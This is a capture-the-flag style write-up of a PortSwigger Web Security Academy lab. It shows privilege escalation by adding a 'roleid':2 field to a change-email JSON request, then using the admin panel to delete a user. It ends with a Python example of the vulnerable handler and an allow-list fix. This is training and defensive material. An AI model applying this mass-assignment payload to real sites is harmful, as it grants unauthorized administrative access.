| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Role Modifiable via Profile Update) |
| Difficulty | Apprentice |
| Objective | Access the admin panel and delete the user carlos |
User Role Can Be Modified in User Profile
Log in as wiener:peter. Trying:
web-security-academy.net/admin
Returns "Admin interface only available if logged in as an administrator." Nothing useful in the page source. Unlike some labs, there's no Admin= cookie to flip in the session. Checking /my-account:
There's a form to change email. Clicking update and intercepting:
```http
POST /my-account/change-email HTTP/2
Host: 0a500042042a1602820de2a8006e00f2.web-security-academy.net
Cookie: session=bJ1VFvnTwUFH3R567riQp4XzJi1ebJdn

{"email":"[email protected]"
}
```
The lab description says admin access requires roleid=2. Since the email update is a JSON body we fully control, try adding that field directly:
```json
{"email":"[email protected]",
"roleid":2
}
```
The response reflects it back:
```json
{
"username": "wiener",
"email": "[email protected]",
"apikey": "PY2nReOWTlOtELTl5mZbm85MvJFatP5N",
"roleid": 2
}
```
roleid is now 2. Going to /admin:
Access granted. Clicking delete on carlos:
Lab is solved.
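The root cause is that the change-email handler merges every key in the JSON body into the stored profile, so a client-supplied `roleid` overwrites the server-assigned one. The following is an added example, not the lab's or PortSwigger's code: a minimal model of the vulnerable handler beside an allow-list fix that only copies the field the endpoint exists to change and reports any extra keys for logging. The user store, field names and `ALLOWED_FIELDS` are assumptions constructed for the example; `ADMIN_ROLE = 2` follows the lab description.

```python
import json

# Constructed sample store for the example; not the lab's real data.
USERS = {"wiener": {"username": "wiener", "email": "wiener@example.net", "roleid": 1}}
ADMIN_ROLE = 2            # lab description: admin access requires roleid=2
ALLOWED_FIELDS = {"email"}  # the only field the change-email form should touch


def vulnerable_change_email(user, body_json):
    """Mirrors the lab bug: every key in the JSON body is merged into the profile,
    so a client can set roleid (or any other column) alongside the email."""
    record = dict(USERS[user])
    record.update(json.loads(body_json))
    return record


def hardened_change_email(user, body_json):
    """Allow-list fix: copy only the field this endpoint is meant to change.
    Returns the updated record plus any unexpected keys so the caller can
    log or alert on attempted mass assignment."""
    body = json.loads(body_json)
    unexpected = sorted(set(body) - ALLOWED_FIELDS)
    record = dict(USERS[user])
    if "email" in body and isinstance(body["email"], str):
        record["email"] = body["email"]
    # roleid is never read from the request; it stays whatever the server stored.
    return record, unexpected


def is_admin(record):
    """Authorization check as the /admin panel would perform it."""
    return record.get("roleid") == ADMIN_ROLE


if __name__ == "__main__":
    payload = '{"email":"wiener@example.net","roleid":2}'
    print("vulnerable -> admin?", is_admin(vulnerable_change_email("wiener", payload)))
    fixed, extra = hardened_change_email("wiener", payload)
    print("hardened   -> admin?", is_admin(fixed), "unexpected keys:", extra)
```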